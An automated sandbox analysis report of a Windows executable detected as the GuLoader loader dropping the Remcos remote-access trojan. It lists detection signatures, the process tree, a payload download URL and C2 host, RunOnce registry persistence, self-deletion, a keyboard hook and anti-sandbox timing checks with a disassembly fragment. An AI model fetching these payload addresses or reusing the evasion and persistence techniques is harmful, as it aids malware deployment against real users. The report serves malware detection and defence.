Play interactive tour

Edit tour

Windows Analysis Report Fec9qUX4at.exe

Overview

General Information

Sample Name:	Fec9qUX4at.exe
Analysis ID:	458355
MD5:	2046b941817392e3815535fccb1f39dc
SHA1:	843d243a71131baf9fbe0fcf4ba129f51ee74c8f
SHA256:	c0d3da1cefd1a979c8b8ce102fd5d3ff090779f72f4d1098eb383cbbb3480bee
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

GuLoader Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

GuLoader behavior detected

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Creates autostart registry keys with suspicious values (likely registry only malware)

Deletes itself after installation

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses dynamic DNS services

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Internet Provider seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Fec9qUX4at.exe (PID: 1304 cmdline: 'C:\Users\user\Desktop\Fec9qUX4at.exe' MD5: 2046B941817392E3815535FCCB1F39DC)

Fec9qUX4at.exe (PID: 1152 cmdline: 'C:\Users\user\Desktop\Fec9qUX4at.exe' MD5: 2046B941817392E3815535FCCB1F39DC)

wscript.exe (PID: 808 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.bin"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Fec9qUX4at.exe PID: 1152	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Script Execution From Temp Folder

Show sources

Source: Process started

Author: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Fec9qUX4at.exe' , ParentImage: C:\Users\user\Desktop\Fec9qUX4at.exe, ParentProcessId: 1152, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' , ProcessId: 808

Sigma detected: WScript or CScript Dropper

Show sources

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Fec9qUX4at.exe' , ParentImage: C:\Users\user\Desktop\Fec9qUX4at.exe, ParentProcessId: 1152, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' , ProcessId: 808

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.bin"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe	Virustotal: Detection: 28%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe	ReversingLabs: Detection: 13%

Multi AV Scanner detection for submitted file

Show sources

Source: Fec9qUX4at.exe	Virustotal: Detection: 28%			Perma Link
Source: Fec9qUX4at.exe	ReversingLabs: Detection: 13%

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: Fec9qUX4at.exe

Joe Sandbox ML: detected

Source: Fec9qUX4at.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: wealthyrem.ddns.net

Source: global traffic

TCP traffic: 192.168.2.3:49733 -> 194.5.97.128:39200

Source: Joe Sandbox View

ASN Name: DANILENKODE DANILENKODE

Source: global traffic

HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119

Source: global traffic

HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: wealthyrem.ddns.net

Source: Fec9qUX4at.exe, 00000011.00000002.487607520.00000000009A7000.00000004.00000020.sdmp

String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Fec9qUX4at.exe

Source: Fec9qUX4at.exe, 00000000.00000002.338277052.000000000063A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR

System Summary:

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5586A NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F505E0 EnumWindows,NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F509C7 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F58F67 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F542D5 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F558D5 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54693 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54A46 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54A2D NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54C15 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F58FBB NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5475A NtWriteVirtualMemory,

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_00401144
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F584C9
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5209D
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F50C76
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F55661
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5586A
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F505E0
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F509C7
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F59577
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F52559
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F542D5
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F514D1
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F514D9
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F506D9
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F50CC2
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F510C2
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F520C2
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F538B9
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F57AA5
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F57EAD
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F52AAE
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54693
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54292
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F58C9D
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F53051
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F55C5C
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54A46
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5864F
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F53424
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54A2D
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F54C15
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F55E11
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5380C
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F585F7
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F50BE6
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F53FDB
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F577CC
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F53996
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F51D86
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F58181
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F51D8F
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F52D7C
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F57F61
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F58355
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F58759
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5475A
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5215A
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F5293E
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Code function: 0_2_04F52138

Source: Fec9qUX4at.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Fec9qUX4at.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FANEBREREN.exe.17.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FANEBREREN.exe.17.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Fec9qUX4at.exe, 00000000.00000002.338068961.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000000.00000002.338242291.00000000005F0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.491236633.000000001E770000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.491236633.000000001E770000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000000.336595549.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.490989304.000000001DD60000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.487682581.0000000000A0E000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.487682581.0000000000A0E000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.491075491.000000001E670000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe	Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe

Source: Fec9qUX4at.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/4@1/2

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

File created: C:\Users\user\AppData\Local\Temp\~DFDAA17C5C5846B2AF.TMP

Jump to behavior

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs'

Source: Fec9qUX4at.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Fec9qUX4at.exe	Virustotal: Detection: 28%
Source: Fec9qUX4at.exe	ReversingLabs: Detection: 13%

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

File read: C:\Users\user\Desktop\Fec9qUX4at.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe'
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe'
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs'
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe'
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs'

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Code function: 0_2_00407CF7 push eax; ret

Source: initial sample	Static PE information: section name: .text entropy: 7.05513425915
Source: initial sample	Static PE information: section name: .text entropy: 7.05513425915

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

File created: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe

Jump to dropped file

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)

Show sources

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.vbs			Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.vbs			Jump to behavior

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS	Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

File deleted: c:\users\user\desktop\fec9qux4at.exe

Jump to behavior

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\Fec9qUX4at.exe

Code function: 0_2_04F50C76 TerminateProcess,

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000004F57394 second address: 0000000004F57394 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx], al 0x0000000c pushad 0x0000000d mov ah, 58h 0x0000000f cmp ah, 00000058h 0x00000012 jne 00007F9040DE846Ch 0x00000018 popad 0x00000019 inc ebx 0x0000001a inc edx 0x0000001b dec ecx 0x0000001c test ecx, ecx 0x0000001e jne 00007F9040DEB55Fh 0x00000020 mov al, byte ptr [edx] 0x00000022 pushad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000004F54701 second address: 0000000004F54701 instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 000000000056160D second address: 000000000056160D instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 0000000000565E34 second address: 0000000000565E34 instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	RDTSC instruction interceptor: First address: 00000000005638CF second address: 00000000005638CF instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\Fec9qUX4at.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\Fec9qUX4at.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\FANEBREREN.EXE\DYKKERDRAGTSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEAMPHITHYRONS
